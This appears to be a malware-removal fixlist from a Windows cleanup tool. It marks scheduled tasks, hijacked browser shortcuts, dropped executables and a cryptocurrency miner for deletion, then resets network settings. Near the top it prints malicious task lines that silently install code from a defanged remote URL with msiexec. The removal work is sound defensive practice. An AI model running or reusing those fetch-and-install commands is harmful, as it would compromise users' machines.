Task: {9BC3B939-3C84-4CDF-94C9-1B0D0591DC87} - System32\Tasks\Microsoft\Windows\DeviceSettings\Puperpysikuy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&amp;d=20170530 /q <==== ATTENTION
Task: {B1634AE3-FE78-4284-A8D8-3EF65484757E} - System32\Tasks\Bjuchsupoent Community => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&amp;d=20170407 /q <==== ATTENTION
Task: {B2253CB4-301D-4EDF-B5ED-6F03B9182541} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-27] () <==== ATTENTION
C:\Program Files (x86)\MIO
Task: {E882D6F8-9F53-49CD-8EA1-AF01F04F8F4F} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {F4B09842-A251-4FA9-8824-A11C54AD00D9} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\User\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) ->  --load-extension="C:\Users\User\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
2017-05-30 19:00 - 2017-05-30 19:00 - 00307200 _____ () C:\Windows\TEMP\g4ED2.tmp.exe
2017-05-30 19:01 - 2017-05-30 19:01 - 00476672 _____ () C:\Windows\TEMP\gDA0.tmp.exe
2017-02-03 15:27 - 2017-02-03 15:27 - 00289792 ____H () C:\Program Files (x86)\Bekserikut Log\local64spl.dll
2017-05-30 18:16 - 2017-05-30 18:17 - 00007680 _____ () C:\Users\User\AppData\Roaming\qsbmbhsyi5n\jrtmlrcem5k.exe
2017-05-30 19:27 - 2017-05-30 19:27 - 00144896 _____ () C:\Users\User\AppData\Roaming\Minerent\Wuteghtplejipy.dll
2017-05-30 18:17 - 2017-05-30 18:17 - 00007680 _____ () C:\Users\User\AppData\Roaming\fdgsooj4hcw\00vihxx214b.exe
2017-05-30 18:46 - 2017-05-30 18:46 - 00007680 _____ () C:\Users\User\AppData\Roaming\wofdlyh3mtz\jub1mo14lha.exe
2017-05-30 18:47 - 2017-05-30 18:47 - 00007680 _____ () C:\Users\User\AppData\Roaming\rwheqpsdj5s\ysfsny2kt1i.exe
2017-05-30 18:47 - 2017-05-30 18:47 - 00007680 _____ () C:\Users\User\AppData\Roaming\rgj4geoi4kx\4ofrchtpykc.exe
2017-05-30 19:14 - 2017-05-30 19:14 - 00007680 _____ () C:\Users\User\AppData\Roaming\5k4r2bbnlq1\jt401bjv5lg.exe
2017-05-30 19:17 - 2017-05-30 19:17 - 00007680 _____ () C:\Users\User\AppData\Roaming\etexyvrgmh4\jatr0sdxxuh.exe
2017-05-30 19:17 - 2017-05-30 19:17 - 00007680 _____ () C:\Users\User\AppData\Roaming\0awgowyo0ms\0nhwku5oyj2.exe
2017-05-30 22:41 - 2017-05-30 22:41 - 00007680 _____ () C:\Users\User\AppData\Roaming\ws35pv4otzu\exrir35so13.exe
2017-05-30 19:27 - 2017-05-30 19:27 - 00007680 _____ () C:\Users\User\AppData\Roaming\aesf43dd52u\r23xflwmacl.exe
2017-05-30 18:24 - 2017-05-30 18:25 - 01468261 _____ () C:\Users\User\AppData\Roaming\isMiner\gw64-core2.exe
2017-05-30 19:27 - 2017-05-30 19:27 - 00007680 _____ () C:\Users\User\AppData\Roaming\u5cbuyosxxt\221tqfnete3.exe
2017-05-30 22:42 - 2017-05-30 22:42 - 00007680 _____ () C:\Users\User\AppData\Roaming\1nuxxy02ibu\cjuwkzecetj.exe
2017-05-30 22:42 - 2017-05-30 22:42 - 00007680 _____ () C:\Users\User\AppData\Roaming\ocaxkzchr0f\0y51erqgzkl.exe
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp: